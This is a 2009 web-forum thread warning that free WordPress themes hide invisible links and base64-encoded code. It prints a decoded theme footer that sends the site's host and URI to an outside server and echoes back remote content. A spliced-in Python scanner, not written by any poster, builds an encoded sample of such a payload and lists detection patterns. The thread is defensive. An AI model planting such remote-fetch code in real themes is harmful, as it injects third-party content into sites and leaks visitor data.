Greenguy's Board

Warning Using Free WP Themes (http://www.greenguysboard.com/board/showthread.php?t=52632)

walrus 2009-05-03 03:44 PM

Warning Using Free WP Themes
 
Just wanted to give people a heads up, the last two themes I downloaded have had hidden links inside the code for the index file.

They wouldn't show up on the page but were viewable when you looked at the source.

cd34 2009-05-03 03:55 PM

I suspected the same on a client's site that runs multiple wordpress installations and has used multiple free templates. In 5 of the cases, the templates included code in the header.php and sidebar.php that allowed specially crafted strings to allow remote execution. We weren't able to determine whether the modification was made prior to his template being installed or was the result of someone having his admin password for a few of the blogs, as he didn't have the original template file zips.

walrus 2009-05-03 04:46 PM

None of the stuff I've found, so far, has been malicious but I do suggest anyone using free themes look at them closely.

I've never noticed it before but one of the themes I had issues with was one I'd downloaded about a year ago. I just had never used it.

nate 2009-05-03 07:53 PM

What were the hidden links to? And were they base64 encoded? I've seen a couple of those, and could have just decoded and removed the base64 encoded crap, but I ditched the themes instead.

walrus 2009-05-03 09:39 PM

Quote:

Originally Posted by nate (Post 450172)
What were the hidden links to? And were they base64 encoded? I've seen a couple of those, and could have just decoded and removed the base64 encoded crap, but I ditched the themes instead.

A lot of themes are doing the base64 encoded crap and, while there is way too much chance for someone messing with your site, I haven't seen any that were malicious.

These were links written as html but positioned in such a way that they were not visible. One of them redirected to what looks like an old tube site. The others I didn't follow but deleted.

cd34 2009-05-03 10:30 PM

Encoding makes it hard for someone to change the link and remove the link that they are trying to send a little PR to. It is usually wrapped around some other function so that removing it breaks the template somewhat. That's their 'payment' for making the free template.

However, it does make it incredibly easy to hide a malicious payload -- a payload that probably 90% of the internet wouldn't ever notice. If you had something unique enough in the template that you could find sites using it through a google search, you could exploit a few machines.

It is the reason I suspect that the templates were not delivered with exploits, but, modified through the wordpress admin.

whitey 2009-05-05 12:46 PM

Quote:

Originally Posted by walrus (Post 450155)
Just wanted to give people a heads up, the last two themes I downloaded have had hidden links inside the code for the index file.

They wouldn't show up on the page but were viewable when you looked at the source.

Also, check the footers of any free template. Quite a few have hidden links or Base64 code. I simply do not use them or eliminate the code.

teenrave 2009-05-05 01:19 PM

I checked mine and luckily didn't have any crap in there. But yeah, definitely want to check and make sure there isn't something that might change your blog without your knowing it.

nate 2009-05-07 12:04 AM

Quote:

check the footers of any free template
Not just the footers. It could be in any file.

Maj. Stress 2009-05-07 12:41 AM

Maybe This will help. Read the entries towards the bottom of the page.

cd34 2009-05-07 01:05 AM

The problem is that when you decode it like that, you see the rendered code. So, if there was a widget called in the footer, you would have the rendered widget and you couldn't use the wordpress admin to control it.

Secondly, if you do view the rendered text and think, ok, I'm good with what is being displayed, you would miss any possible exploits that require certain parameters or header values and you wouldn't be able to see the actual code being executed.

I wouldn't use that as a safety net, though. If it didn't include your existing footer widgets, then I would think you should be ok.

What I'm starting to see somewhat frequently is that they are wrapping integral page functions into their encoding to prevent you from blindly removing the encoded block.

HowlingWulf 2009-05-27 04:42 PM

I just downloaded a free WP theme and I like to check the code as well, so I decoded the footer.php and found

Code:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"])."&uri=".urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) {
        echo @file_get_contents($CodeURL);
} elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) {
        $content = @file($CodeURL);
        echo @join("", $content);
} elseif (function_exists("curl_init")) {
        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
}

I'm not sure what it's doing, but I don't like it.

cd34 2009-05-27 05:03 PM

They are grabbing a link from their rotator script based on the domain that is requesting it. They would be able to change the links displayed in the footer based on your domain name.
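An added example, not code from any poster in this thread: a small Python scanner of the kind cd34 and HowlingWulf describe, which peels eval(base64_decode(...)) and gzinflate layers so the PHP that would actually run is visible (not just the rendered output), then flags the patterns discussed above (remote fetch keyed on HTTP_HOST, request data reaching code, invisible links). The sample footer, rotator URL and link are constructed placeholders.

```python
import base64
import re
import zlib

# Constructed sample of the footer.php pattern the thread describes (not a real theme): an
# eval'd base64 blob, itself wrapping a gzinflate'd layer, that fetches remote content keyed
# on the visiting domain, plus an invisible outbound link. URLs are placeholders.
_INNER = ('error_reporting(0); $u = "http://rotator.example.invalid/content.php?host="'
          '.urlencode($_SERVER["HTTP_HOST"]); echo @file_get_contents($u);')
_RAW_DEFLATE = zlib.compress(_INNER.encode())[2:-4]   # drop zlib header/adler32 = PHP gzdeflate()
_OUTER = 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(_RAW_DEFLATE).decode()
SAMPLE_FOOTER = ('<?php eval(base64_decode("%s")); ?>\n'
                 '<div style="display:none"><a href="http://spam.example.invalid/">tube</a></div>\n'
                 % base64.b64encode(_OUTER.encode()).decode())

# base64_decode("...") optionally inside gzinflate(...); the conditional group consumes the
# trailing ")" only when gzinflate( was matched, so eval's own ")" is left alone.
_ENC = re.compile(r'(gzinflate\s*\(\s*)?base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)(?(1)\s*\))')

def _decode_once(m):
    raw = base64.b64decode(re.sub(r'\s', '', m.group(2)))
    if m.group(1):                                    # raw DEFLATE stream, as gzinflate() expects
        raw = zlib.decompress(raw, -15)
    return raw.decode('utf-8', 'replace')

def unwrap(src, max_layers=8):
    """Replace each encoded blob with its plaintext, repeatedly, so the PHP that would run
    is visible instead of only its rendered output. Returns (decoded source, layers peeled)."""
    layers = 0
    while layers < max_layers:
        new = _ENC.sub(_decode_once, src)
        if new == src:
            break
        src, layers = new, layers + 1
    return src, layers

# Heuristic indicators worth a manual look: (name, regex over the decoded source).
INDICATORS = [
    ('eval of dynamic code', re.compile(r'\beval\s*\(')),
    ('remote content fetch', re.compile(r'\b(file_get_contents|curl_init|fsockopen)\s*\(')),
    ('host/uri sent to third party', re.compile(r'\$_SERVER\s*\[\s*["\'](HTTP_HOST|REQUEST_URI)')),
    ('request data reaches code', re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b')),
    ('hidden link', re.compile(r'(display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>\s*<a\b', re.I)),
]

def scan(src):
    """Decode, then match indicators. Returns (layers peeled, sorted names of rules that fired, decoded source)."""
    decoded, layers = unwrap(src)
    return layers, sorted(name for name, rx in INDICATORS if rx.search(decoded)), decoded
```

Run scan() over the contents of every .php file in a theme (footer.php, header.php, sidebar.php, functions.php), and review the decoded source of anything that fired rather than trusting the rendered page.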

burntfilm 2009-05-31 03:28 PM

thanks for the heads up

babymaker 2009-06-13 08:01 PM

Download the TAC plugin. I don't have the link, but Google it; it works great to scan your themes :)

onehotasianbabe 2009-06-16 02:07 AM

Is it possible to have the names of those WP themes? Thanks for bringing this up.

kickass 2009-06-16 11:13 AM

mmm, thanks for letting us know!

walrus 2009-06-16 01:48 PM

Quote:

Originally Posted by onehotasianbabe (Post 454324)
Is it possible to have the names of those WP themes? Thanks for bringing this up.

Seriously, there are too many to list. Most of the ones created within the last year seem to have encoded footers at least.

babymaker 2009-06-16 06:13 PM

Quote:

Originally Posted by onehotasianbabe (Post 454324)
Is it possible to have the names of those WP themes? Thanks for bringing this up.


as was previously posted, too many too list and who know what you are using, some of them, it's not malicious, it's just them maybe taking some probably crap traffic that didn't already buy from you posts in the bottom footer, so those, if the theme is good seo wise and looks good, go ahead and use it, i mean it's free and they person who made it might as well make a bit of cash for their hard work, but others do has evil code in them, download the TAC plugin that i listed earlier and test the theme.

unleashthefury 2009-06-17 05:26 AM

Thanks. Before reading this I had just thought editing the index file and deleting the links would help, but everything seems to be a lot more complicated. Thanks again.

